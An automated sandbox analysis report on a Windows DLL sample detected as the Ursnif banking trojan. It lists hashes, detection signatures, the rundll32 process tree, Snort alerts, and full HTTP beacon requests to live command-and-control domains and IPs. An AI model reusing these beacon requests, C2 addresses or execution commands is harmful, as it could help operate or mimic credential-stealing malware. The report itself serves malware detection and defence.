Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report direction.dll

Overview

General Information

Sample Name:direction.dll
Analysis ID:454630
MD5:499200f6a8e223c057c6e16701740721
SHA1:ef46f9c62b94715b750173074c51100285ff6fe9
SHA256:d7e64f8e65ce586ce2f0a857810b2a23f85140bf5e52e5a824f09787fb2bf45e
Tags:exe
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Creates an undocumented autostart registry key
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1112 cmdline: loaddll32.exe 'C:\Users\user\Desktop\direction.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 3492 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6096 cmdline: rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3484 cmdline: regsvr32.exe /s C:\Users\user\Desktop\direction.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 4876 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 2412 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6436 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82950 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6692 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17432 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6340 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17436 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5156 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17446 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5628 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82994 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6116 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17448 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4912 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:4876 CREDAT:345098 /prefetch:2 MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • rundll32.exe (PID: 2788 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Opisthotonos MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5496 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Hydrazo MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6132 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Overlock MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3340 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Automobilist MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3164 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Swampland MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6044 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Subarachnoid MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5776 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Bechained MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6220 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Unforeseenness MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6408 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Incrimination MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6648 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Oversystematic MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6912 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Shieldless MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7148 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Tsarevitch MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1752 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Torchbearer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6008 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Moler MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6468 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Hyperpigmented MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6680 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Adipous MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5208 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Undazzled MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6736 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Peckishness MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4880 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Musophagidae MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1200 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Impracticability MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001D.00000003.378625315.0000000007038000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000025.00000003.377493351.0000000004DD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000025.00000003.377965158.0000000004DD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.311524136.0000000005018000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000002.00000003.299067540.00000000052E8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 60 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: direction.dllVirustotal: Detection: 22%Perma Link
            Source: 2.2.regsvr32.exe.10000000.4.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 4.2.rundll32.exe.10000000.4.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 0.2.loaddll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: direction.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.3:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.3:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.3:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.3:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.70:443 -> 192.168.2.3:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.70:443 -> 192.168.2.3:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49758 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49754 version: TLS 1.2

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49775 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49776 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49777 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49778 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49779 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49780 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49781 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49793 -> 162.255.119.73:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49796 -> 162.255.119.73:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49796 -> 162.255.119.73:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49798 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49799 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49801 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49801 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49802 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49803 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49804 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49805 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49807 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49808 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49808 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49809 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49809 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49811 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49811 -> 195.110.59.2:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49812 -> 162.255.119.245:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49815 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49818 -> 162.255.119.245:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49820 -> 198.54.117.210:80
            Source: global trafficHTTP traffic detected: GET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/T3XNZT6zZjYD38/irugL9bm6bNKUFAIonM6H/wQL3HgmSBf4ywwYC/sCXsyThPbupkuWW/HhhD2tIgDuvCZc7SAr/u3tIlTv46/0VagixoIliZmOzrIJ8Gv/e15Bb16QLC3Qf1P6zSC/O1DjOyt740UVseH_2FPgwL/iVEyQ72HDAwgH/K2st7xyH/Ngp0jwDDrKGldAKNE1lGwr3/tPn1Qdvj/JvRqnbko7/r.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/EyekExaBW/AOmJRyo4fJFkPCi2jsPG/WyXo9UA7YyvHWkf5vtk/lKMztsIaB1HB9NTYYsSHgD/fQz2o9_2FQPif/0fDicM8g/8PZEF_2FfgYAg2gcvHBhP_2/FUzJr56vzj/WTbT4OEmvC2xapmxA/FYCvjWtA654H/XdKJrCOAQpA/_2BYDSsnxLQkRX/is5GUyU1jivaQMJ/C0L6SBH.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: rundll32.exe, 00000004.00000003.470024227.0000000002BA1000.00000004.00000001.sdmpString found in binary or memory: http://allianceline.bar
            Source: rundll32.exe, 00000004.00000003.421876543.0000000002BA1000.00000004.00000001.sdmpString found in binary or memory: http://allianceline.bar/jdraw/Gp9teWEG7kYAFsedbNc/UjTWH9ALqm6j8DrZlcMNvN/A7uHg_2BWB8_2/FmuvQjea/W3LR
            Source: rundll32.exe, 00000004.00000002.485605152.0000000002BA1000.00000004.00000001.sdmpString found in binary or memory: http://alliancer.bar
            Source: rundll32.exe, 00000004.00000002.484637438.0000000002B4B000.00000004.00000001.sdmpString found in binary or memory: http://alliancer.bar/jdraw/IxaYG2PhzMHjwCX0WBwc/cmAvcstzmSKw031RJA_/2Fjblh6hTZRKkvCXX1cutr/m_2BxwDBu
            Source: rundll32.exe, 00000004.00000002.484637438.0000000002B4B000.00000004.00000001.sdmpString found in binary or memory: http://alliances.bar/jdraw/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.3:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.3:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.3:49742 version: TLS 1.2
